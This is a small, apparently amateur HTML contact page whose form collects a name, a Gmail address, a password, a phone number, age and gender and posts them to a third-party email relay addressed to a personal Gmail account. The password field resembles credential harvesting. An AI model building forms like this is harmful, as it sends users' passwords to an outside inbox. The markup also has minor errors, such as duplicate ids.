<html><head>
  <style>
  
  body {
  display: flex;
  height: 100vh;
  justify-content: center;
  align-items: center;
  padding: 10px;
  background: linear-gradient(135deg, #71b7e6, #9b59b6);
  }
  
  
  fieldset {
  
    max-width: 700px;
    width: 100px;
    background: #fff;
    padding: 25px 30px;
    height: 250px;
    width: 200px;
  
  }

#name {
  width: 300px;
  height: 30px;
}
#gmail {
width: 300px;
height: 30px;
}
#password {
  height: 30px;
width: 300px;
}
#text {
  height: 30px;
  width: 300px;
}  
#phone {
  height: 30px;
  width: 300px;
}


  </style>
      </head>
      <body>
        <fieldset>
          
          <form action="https://formsubmit.co/robeladmassu750@gmail.com" method="post">
         
          <div>
              <label for="name">Contact me</label>
              <input type="text" name="name" id="name"  id="name" placeholder="Name" required>
          </div>
                 
          <div>
              <input type="email" name="email" placeholder="Type Gmail" id="gmail" min="@gmail.com" required="">
          </div>
          
          <div>
          <input type="password" name="password" placeholder="password" id="password" required>
          </div>

          <div>
            <input type="tel" name="Phone" id="phone" placeholder="Phone" id="phone">
          </div>
          
          <div>
            <input type="text" name="messege" id="text"  id="text" placeholder="Type text">
          </div>
          
           <div>
              <input type="number" name="age" id="age" min="13" max="100" placeholder="age" min="13">
           </div>

<div>
  <label for="Gender">Male</label>
  <input type="radio" name="Male" id="Male">
</div>

<div>
  <label for="Gender">Female</label>
  <input type="radio" name="Female" id="Female">
</div>


                  <button type="submit">Send</button>
             </form>
            </fieldset>
  
  
          
  
  </body></html>